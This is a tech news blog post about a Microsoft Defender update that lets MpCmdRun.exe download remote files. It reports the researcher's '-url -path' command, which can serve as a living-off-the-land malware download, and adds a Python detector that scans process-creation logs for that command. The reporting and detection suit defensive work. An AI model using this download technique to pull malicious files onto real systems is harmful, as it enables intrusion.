Once again, a Microsoft update has caused problems instead of bringing improvements to their product. This time, the issue appeared in Microsoft Defender following an update.

Microsoft Defender Allowing Malware Download

Reportedly, a security researcher has found a bug in Microsoft Defender antimalware that potentially allows malware to be downloaded.

The problem appeared following a recent feature upgrade with the latest software update. Specifically, the Microsoft Malware Protection Command Line tool MpCmdRun.exe has received an update that now allows downloading files from a remote location.

While the feature isn’t malicious in itself, an attacker can exploit it to load malicious programs onto a target device.

Here’s what the researcher, Mohammad Askar, observed.

He stated that anyone can use Windows Defender to download the desired file via the following path: C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe -url -path

Following this discovery, Bleeping Computer was able to reproduce the exploit. They downloaded a WastedLocker ransomware sample found recently in the Garmin attack.

Is This Really A Problem?

Technically, it’s a serious issue as anyone can download malicious files to the target device via the security tool itself.

However, in a practical scenario, this issue isn’t as serious as it seems. Despite being a LOLBin (living-off-the-land binary), exploiting it is somewhat tricky as Windows Defender scans every file before downloading. Hence, if it detects any malicious file, it will simply block it right away.

In a statement to Forbes, a Microsoft spokesperson confirmed the same:

"Despite these reports, Microsoft Defender antivirus and Microsoft Defender ATP will still protect customers from malware. These programs detect malicious files downloaded to the system through the antivirus file download feature."

Nonetheless, since the attack theoretically remains possible, Microsoft needs to fix this as soon as possible. Meanwhile, Windows admins and blue teamers have one more exploit to watch out for.
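For blue teams, one way to watch for this is to review process-creation logs for MpCmdRun.exe started with both the -url and -path arguments shown above. The following is an added example, not code from the researcher or Microsoft; the field names assume Sysmon Event ID 1 style records exported as dictionaries, and the sample events are constructed.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

_TOKEN = re.compile(r'"[^"]*"|\S+')  # quoted strings stay one token

def _tokens(command_line):
    return [t.strip('"') for t in _TOKEN.findall(command_line)]

def _value_after(tokens, flag):
    """Token following `flag` (case-insensitive), or None if absent."""
    lowered = [t.lower() for t in tokens]
    if flag not in lowered:
        return None
    i = lowered.index(flag) + 1
    return tokens[i] if i < len(tokens) and not tokens[i].startswith("-") else None

def find_mpcmdrun_downloads(events):
    """Flag process-creation events where MpCmdRun.exe got both -url and -path."""
    findings = []
    for ev in events:
        if basename(ev.get("Image", "")).lower() != "mpcmdrun.exe":
            continue  # other binaries that merely mention the flags are ignored
        toks = _tokens(ev.get("CommandLine", ""))
        flags = {t.lower() for t in toks}
        if {"-url", "-path"} <= flags:
            findings.append({"host": ev.get("Computer"),
                             "parent": ev.get("ParentImage"),
                             "url": _value_after(toks, "-url"),
                             "dest": _value_after(toks, "-path")})
    return findings

# Constructed sample events (hosts, URL and paths are made up for illustration).
DEFENDER = r"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe"
SAMPLE_EVENTS = [
    {"Computer": "ws01", "Image": DEFENDER, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": f'"{DEFENDER}" -SignatureUpdate'},
    {"Computer": "ws02", "Image": DEFENDER, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f'"{DEFENDER}" -URL https://files.example.test/a.bin -Path "C:\\Users\\Public\\my file.bin"'},
    {"Computer": "ws03", "Image": r"C:\Windows\System32\findstr.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'findstr "-url -path" notes.txt'},
]

if __name__ == "__main__":
    for finding in find_mpcmdrun_downloads(SAMPLE_EVENTS):
        print(finding)
```

Each finding carries the parent process, the requested URL and the destination path, which is what an analyst needs to decide whether the download was an administrator's action or something to investigate.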

Let us know your thoughts in the comments.


Abeerah has been a passionate blogger for several years with a particular interest towards science and technology. She is crazy to know everything about the latest tech developments. Knowing and writing about cybersecurity, hacking, and spying has always enchanted her. When she is not writing, what else can be a better pastime than web surfing and staying updated about the tech world!


